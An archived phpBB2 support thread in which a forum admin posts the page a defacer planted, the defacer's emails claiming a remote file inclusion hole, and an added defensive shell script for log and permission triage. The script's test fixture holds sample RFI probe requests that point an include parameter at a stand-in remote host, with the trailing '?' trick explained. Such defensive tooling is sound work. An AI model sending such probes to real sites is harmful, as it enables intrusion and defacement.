"white Hat" defacing

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
stardotstar
Registered User
Posts: 70
Joined: Fri Aug 01, 2003 2:07 am
Location: Brisbane, Australia

"white Hat" defacing

Post by stardotstar » Sun Jun 18, 2006 7:12 am

Probably my bad - permissions or something - but I have just finished cleaning up after a guy who claims that his exploit is a result of my not having an up-to-date phpBB. I am running 2021, but I have lots of mods and am not a security guru anyway... Just in case this means anything to anyone here, I am pasting the HTML that was injected into my www root (Debian/Apache2), seemingly from a compromise of the www-data account - I don't know where or how yet.

helios:/var/backups# cat blackmind.html
<html>
<title>Hacked by mr.BlackMind [Digital_Circus Group] [DCG]</title>
<center>
<img src='http://img182.imageshack.us/img182/1858/avatar512x3846ml.jpg' />

<br>
Hacked by mr.BlackMind </center>

</html>
helios:/var/backups# cat index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {
        color: #E90158;
        font-weight: bold;
}
-->
</style>
</head>

<embed src="a.mp3" hidden=true autostart=true>
<noembed>
<bgsound src="a.mp3">
</noembed>

<body>
<p>ADMIN SORRY.I AM NOT BAD HACKER!I WANT JUST TO INFORM YOU THAT THE PHPBB2 YOU HAVE IS VULNERABLE TO REMOTE FILE INCLUSION.PLEASE UPDATE IT. IF YOU WANT MORE HELP CONTACT WITH ME AT skatanafate@freemail.gr </p>
<p>HI. MY MAM IS THE GYPRUS AND MY FATHER THE GREECE hahahaha.</p>
<p>THEY DO ME AND I FUCK TURKEY :D</p>
<p>I SUGGEST TO OPEN THIS HTML WITH INTERNET EXPLORER.OPEN IT WITH FIREFOX ONLY IF YOU HAVE QUIQ TIME ;) </p>
<p class="style1"><a href="http://www.archeli.com.au/phpBB2">FORUM</a></p>
<p><img src="http://www.geocities.com/xplanet2005/GR3_CY.JPG" width="338" height="560" /> </p>
<p>now listen a song.A GREEK SONG!! GREEK SIRTAKI :) (an old song...with BOUZOUKI instrument) :D</p>
<p>&nbsp;</p>
<p>PLEASE UPDATE YOUR VERSION!</p>
<p>&nbsp;</p>
<p>peace...</p>
<p>&nbsp;</p>
<p>not bad hacker!I want just to inform you!! :D   </p>
</body>
</html>
helios:/var/backups#
For reasons I can't fathom, I didn't notice the problem till it was reported by an MSIE user - Firefox was not affected.

Further problems appear to be associated with this attack - I have some worrying logs, but I won't post them here because this post may be in the wrong place or something.

I did google this html but found no other reference to this crack.
\x!\\_

stardotstar
Registered User
Posts: 70
Joined: Fri Aug 01, 2003 2:07 am
Location: Brisbane, Australia

Post by stardotstar » Sun Jun 18, 2006 10:50 am

This guy registered on my site before the defacing and has just now emailed me from the board:
gr3_cy wrote: Message sent to you follows
~~~~~~~~~~~~~~~~~~~~~~~~~~~

hi, your site is vulnerable. I saw that when I visited now: this
http://www.archeli.com.au/ doesn't open the phpBB2... you have to put a script there to
redirect to phpBB2..
make a txt and copy paste this into the txt

<?php
header("Location: /phpBB2");
exit; // stop here so nothing else is sent after the redirect
?>


now change the txt to php and give it the name index

so the new file will be index.php. now upload it in the folder where I uploaded my
html and now this php will redirect http://www.archeli.com.au/ to
http://www.archeli.com.au/phpBB2

this is what you want? :) I told you this because now when you visit
http://www.archeli.com.au/ it does not open the phpBB2 ;) do this, I say ;) but
your server is still vulnerable!! THIS IS JUST TO REDIRECT!!

for any problem add me on your msn gr3_cy@hotmail.com or mail me at
skatanafate@freemail.gr


gr3_cy wrote: Message sent to you follows
~~~~~~~~~~~~~~~~~~~~~~~~~~~

because you can't copy paste a php script you didn't get all the php script from the
previous email.. add me on your msn gr3_cy@hotmail.com so I can give it to you from there..


I take it that this is all because of my www root security and not an exploit in phpBB2, or this would be a known problem that is fixed??

I have revised all permissions and ownership in the www root and below and hope that this resolves the security issue. I have had no personal correspondence with this cracker at all. I note that the site is operating normally now in MSIE and Firefox.
\x!\\_
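An added triage script for the two things this thread turns on: the "worrying logs" and the attacker's claim of remote file inclusion in the first post, and the www-data-writable web root the poster revised permissions on above. It is example code, not from the original posts and not phpBB or mod code. It assumes an Apache combined-format access log and a web root path; the log lines, file names and RFC 5737 addresses in the fixture are constructed, and the `/phpBB2/mods/example.php?page=` request is a placeholder for what an RFI probe looks like, not a known vulnerability in phpBB2 or any named mod.

```shell
#!/bin/sh
# Added example: post-defacement triage for a phpBB2 web root (not from the thread).
# Assumes an Apache combined-format access log and a web root directory.

# Print requests whose query string passes a URL into a parameter, the shape of a
# remote-file-inclusion probe (?param=http://..., also with %3A%2F%2F encoding).
rfi_hits() {
    grep -iE '\?[^ ]*=(https?|ftp)(%3a|:)(%2f|/){2}' "$1"
}

# Number of such requests in a log file.
rfi_count() {
    rfi_hits "$1" | wc -l | tr -d ' '
}

# Files and directories under a web root that any account on the box can write to.
# Anything the web server user can write is what a compromised www-data could have
# replaced, which is how a defacement page ends up over index.html.
writable_files() {
    find "$1" -xdev \( -type f -o -type d \) -perm -002 -print | sort
}

# Regular files changed in the last N days (default 7): the first list to read
# after a defacement, alongside anything owned by the web server user.
recent_files() {
    find "$1" -xdev -type f -mtime -"${2:-7}" -print | sort
}

# Constructed fixture: a small web root plus five log lines. Addresses are from the
# RFC 5737 documentation ranges; the mod path and "page" parameter are placeholders.
# The trailing "?" in the probe URL is the usual trick to discard whatever suffix
# the vulnerable include() appends to the attacker-supplied path.
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/www/phpBB2/images/avatars"
    printf '<?php echo "forum"; ?>\n' > "$fx/www/phpBB2/index.php"
    printf 'defaced\n' > "$fx/www/index.html"
    printf 'jpeg\n' > "$fx/www/phpBB2/images/avatars/u.jpg"
    chmod 755 "$fx/www" "$fx/www/phpBB2" "$fx/www/phpBB2/images"
    chmod 644 "$fx/www/phpBB2/index.php" "$fx/www/phpBB2/images/avatars/u.jpg"
    chmod 666 "$fx/www/index.html"               # world-writable file: flagged
    chmod 777 "$fx/www/phpBB2/images/avatars"    # world-writable upload dir: flagged
    cat > "$fx/access.log" <<'EOF'
192.0.2.10 - - [18/Jun/2006:06:40:12 +1000] "GET /phpBB2/index.php HTTP/1.1" 200 18432 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Jun/2006:06:58:01 +1000] "GET /phpBB2/mods/example.php?page=http://203.0.113.9/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Jun/2006:06:58:30 +1000] "GET /phpBB2/mods/example.php?page=HTTP%3A%2F%2F203.0.113.9%2Fc.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.4 - - [18/Jun/2006:07:01:44 +1000] "GET /phpBB2/viewtopic.php?t=42&highlight=http HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Jun/2006:07:02:10 +1000] "POST /phpBB2/posting.php HTTP/1.1" 302 0 "http://www.example.com/phpBB2/viewtopic.php?t=42" "Mozilla/5.0"
EOF
    echo "$fx"
}

# Stand-alone run on the fixture.
FIX=$(make_fixture)
echo "== RFI-style requests"; rfi_hits "$FIX/access.log"
echo "== world-writable entries"; writable_files "$FIX/www"
echo "== files changed in the last 7 days"; recent_files "$FIX/www" 7
rm -rf "$FIX"
```

On a real Debian box the log is typically /var/log/apache2/access.log and the web root /var/www; add `find /var/www -user www-data` to the same pass, since files owned by the web server user are exactly the ones a compromised www-data could rewrite. Expect some false positives from `rfi_hits`: a legitimate parameter that carries a URL (a login redirect, for instance) matches the same pattern, so the hits are a list to read, not a verdict.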

karlsemple
Former Team Member
Posts: 39802
Joined: Mon Nov 01, 2004 8:54 am
Location: Hereford, UK
Contact:

Post by karlsemple » Sun Jun 18, 2006 10:52 am

just out of interest what mods do you have installed on the board?

stardotstar
Registered User
Posts: 70
Joined: Fri Aug 01, 2003 2:07 am
Location: Brisbane, Australia

Post by stardotstar » Sun Jun 18, 2006 11:26 am

Lots; it's likely to be associated with the auction mod, which I have not been using but have now completely disabled - PCP, APM, Banners, topics on index, announcements, and on and on.

As I say, I don't think this is actually a phpBB problem so much as security on my server, but I just wanted something to be on phpbb.com to record the exact nature of the defacing.
\x!\\_

karlsemple
Former Team Member
Posts: 39802
Joined: Mon Nov 01, 2004 8:54 am
Location: Hereford, UK
Contact:

Post by karlsemple » Sun Jun 18, 2006 11:28 am

stardotstar wrote: Lots; it's likely to be associated with the auction mod, which I have not been using but have now completely disabled - PCP, APM, Banners, topics on index, announcements, and on and on.

As I say, I don't think this is actually a phpBB problem so much as security on my server, but I just wanted something to be on phpbb.com to record the exact nature of the defacing.



You should really have posted this to the IIT: http://www.phpbb.com/support/incidents/
